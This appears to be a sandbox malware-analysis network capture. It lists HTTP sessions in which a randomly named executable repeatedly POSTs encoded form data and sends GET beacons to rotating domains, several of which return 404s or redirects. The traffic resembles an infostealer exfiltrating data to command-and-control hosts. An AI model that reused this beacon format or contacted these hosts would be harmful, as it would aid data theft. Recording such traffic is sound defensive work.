                                                                                                                                                                                                                        54 | 192.168.11.20 | 49846 | 194.58.112.174 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:56:56.723536968 CEST | 843 | OUT | POST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.293641090 CEST | 843 | OUT | POST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:56:57.541191101 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:57 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Encoding: gzip


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                        55 | 192.168.11.20 | 49847 | 194.58.112.174 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:56:59.513978958 CEST | 6445 | OUT | POST /3ld1/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.lichnyyrost.online
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.lichnyyrost.online
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.lichnyyrost.online/3ld1/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 0&]7By~{{QK0iD3<sn tu9t?d;,6Io-^`2dPH?|XY,,xHuC+/&\oGz<0]\jds9iN?"f2(-8a{}s7'O
Oct 23, 2024 18:56:59.773611069 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 16:56:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.11.20 | 49848 | 194.58.112.174 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:02.289417028 CEST | 540 | OUT | GET /3ld1/?Hh=g6BlO&2rul-=CxEsl70ByyFCVrEmQ1H576bbPcYyg9sIwSrFamSzPlGZOs8aE6QFujQOfXywaJwNxcqmSbu90P/WMPRiAk1blYMq9yYTo32NmbjkK65nzP/wEdpsGvsZrfc= HTTP/1.1
Host: www.lichnyyrost.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:57:02.529087067 CEST | 1289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 23 Oct 2024 16:57:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.11.20 | 49849 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:07.981944084 CEST | 817 | OUT | POST /6fde/ HTTP/1.1
Host: www.innovators.group
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.innovators.group
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 202
Referer: http://www.innovators.group/6fde/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.11.20 | 49850 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:10.623800039 CEST | 837 | OUT | POST /6fde/ HTTP/1.1
Host: www.innovators.group
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.innovators.group
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 222
Referer: http://www.innovators.group/6fde/
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.11.20 | 49851 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:13.262542009 CEST | 5156 | OUT | POST /6fde/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.innovators.group
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.innovators.group/6fde/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Data Ascii: 2rul-= [TRUNCATED]
Oct 23, 2024 18:57:13.262624979 CEST | 2830 | OUT
                                                                                                                                                                                                                        Data Ascii: EWHmfEcRZgYtLNJ7FlHDHMYDG8yQ6ea2RA0EWPMA4CnUXuyKdkUiar/zucGSZ+FB9YIUi+KoOOFxvjNAS37Daz7UpREQxxvdH04eHR1kOjq2qexVvtK+utiJOjMBZ/SRmFuEK4lirNa/5L8qqu5sc+u5oyJT2UNwX2bKxGmWrq0CoHE26XWp6dJOFnSL2f752Be2wEb1Wi0mevd5zlgk0rsJEaI8Z+P5x99tdx9upRaP/D3cSvj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.11.20 | 49852 | 13.248.169.48 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:15.899660110 CEST | 538 | OUT | GET /6fde/?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.innovators.group
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:57:16.002032995 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=nbGTuLemKRTpMBhECM1mMcTVmibgynjed6008TvXOLJMhaVDWlSxtENlCtfhfXIYxXqpopSgMtQMvB67FBGeOiwcmCMnIoT/zPipv8Zc3bHdVtIwetv/s5E=&Hh=g6BlO"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.11.20 | 49853 | 62.149.128.45 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:24.283668041 CEST | 536 | OUT | GET /pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS+CBDl0e/03G6vIGgM2DOx4ZCTRM54bCOA7z+XcSGAiseRvin1n9lPpnkGa0LOYYd0oIGRqFGq723QGUcE=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.caprinaday.net
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:57:24.477386951 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:24 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Length: 5096
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
Oct 23, 2024 18:57:24.477447987 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: or:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
Oct 23, 2024 18:57:24.477490902 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: or:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temp
Oct 23, 2024 18:57:24.477534056 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: b Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td><
Oct 23, 2024 18:57:24.477566957 CEST | 159 | IN
                                                                                                                                                                                                                        Data Ascii: oft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
62 | 192.168.11.20 | 49854 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:29.601295948 CEST | 796 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN70yfjq/gVSp945OfzrkkUv5WM75swcQsPBfQU4Gzhi9gMQOyHSmAljHNPa/e27+JQqI7DIZ+2tfOXdTMiwKgan9WDVWslKi6gtKZqTTeXjvcwHycelnC17RtIYtyTbqUn73mIGsrh9nldCeby9nC1THNO3C9TOvcSLEjONChu6zDQrm1F9D5bCg==


Session ID | Source IP | Source Port | Destination IP | Destination Port
63 | 192.168.11.20 | 49855 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:32.242856979 CEST | 816 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=CsTplFjYYWN71SPjl8YVF5932ufzlEkQv4qM78V1dlEPB+gU5Frhl9gMI+yCdGAujHR9a6227+dQqILDIuLEivORVzMg+qgan9WDVXNIKiigq/JqS3CU9fdCCycehnCx7RsnYor8bvQn72WIG5X+qXlEfuaOs3/eYkJ4zzJRLuhvOSuUQwVK5gfivWMt/B4AfuyN4a2Ck+GtddWt/7PT/ug=


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                        64 | 192.168.11.20 | 49856 | 13.248.169.48 | 80
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881376982 CEST | 6445 | OUT | POST /7eim/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.how2.guru
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.how2.guru/7eim/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:34.881460905 CEST | 1520 | OUT


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                        65 | 192.168.11.20 | 49857 | 13.248.169.48 | 80
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.520389080 CEST | 531 | OUT | GET /7eim/?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.how2.guru
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:37.622842073 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:37 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2rul-=Pu7Jmzu3dQpG1gjbkb05SIIv4sqt6U0nt6quxZgneXVsMN0V8VG/l4BYXcWzXHwprF18XqOi0/cpvqPHAvGxgIKtLyR40JNs4fmKbw9/FUzj8MMoXx+V66E=&Hh=g6BlO"}</script></head></html>


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                        66 | 192.168.11.20 | 49858 | 162.0.231.203 | 80
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.798265934 CEST | 799 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:42.986118078 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:42 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                        67 | 192.168.11.20 | 49859 | 162.0.231.203 | 80
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:57:45.483475924 CEST | 819 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Oct 23, 2024 18:57:45.658035040 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:57:45 GMT
                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                        Content-Length: 389
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                                                                                                        68 | 192.168.11.20 | 49860 | 162.0.231.203 | 80
                                                                                                                                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                        Oct 23, 2024 18:57:48.171219110 CEST | 2578 | OUT | POST /443n/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.ruarlo.xyz
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.ruarlo.xyz
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.ruarlo.xyz/443n/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:57:48.171298981 CEST | 5390 | OUT
Oct 23, 2024 18:57:48.352729082 CEST | 533 | IN | HTTP/1.1 404 Not Found
Date: Wed, 23 Oct 2024 16:57:48 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.11.20 | 49861 | 162.0.231.203 | 80
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:57:50.863835096 CEST | 532 | OUT | GET /443n/?Hh=g6BlO&2rul-=SBUFO7UKbQxT/A0NMCw1slRydQol8mxlPD8CditPqx9i+IWA5JxkazMedHBluKiV/JkaYuM+MOSFojVsVdVmUJrzgHDhlyielwZPRH6/6joZww29waA6pwk= HTTP/1.1
Host: www.ruarlo.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Connection: close
